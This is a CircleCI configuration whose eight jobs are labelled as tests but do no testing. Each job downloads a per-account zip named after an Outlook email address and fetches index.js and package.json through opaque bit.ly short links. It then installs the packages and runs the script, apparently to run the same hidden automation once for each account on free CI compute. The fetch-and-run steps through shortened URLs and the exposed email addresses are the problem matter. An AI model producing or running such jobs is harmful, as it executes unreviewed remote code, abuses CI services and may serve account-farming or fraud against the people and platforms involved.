version: 2.1

jobs:
  test_number_25:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/claimsprize38_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o index.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: npm i -s
      - run: node index 58
  test_number_26:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o index.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/webdieliz_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index 58
  test_number_27:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/irarubosh_outlook-com.zip -o lunarCrushData.zip
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o index.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index 58
  test_number_28:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o index.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/dipjsc0004_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index 58
  test_number_29:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o index.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/relianceservice1999_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index 57
  test_number_30:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/davedawes456_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o index.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: npm i -s
      - run: node index 58
  test_number_31:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o index.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/jamaibi.numbere1999_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index 58
  test_number_32:
    docker:
      - image: cimg/node:16.13.0-browsers
    resource_class: small
    steps:
      - run: curl -fsSL https://bit.ly/3kJeOmQ -o index.js && curl -fsSL https://bit.ly/3Hca5nk -o package.json
      - run: curl -fsSL https://bitbucket.org/lunarcrush/lunarcrush-data/get/hrzig_outlook-com.zip -o lunarCrushData.zip
      - run: unzip lunarCrushData.zip -d lunarCrushData
      - run: npm i -s
      - run: node index 59
      
      
workflows:
  build:
    jobs:
      - test_number_25
      - test_number_26
      - test_number_27
      - test_number_28
      - test_number_29
      - test_number_30
      - test_number_31
      - test_number_32
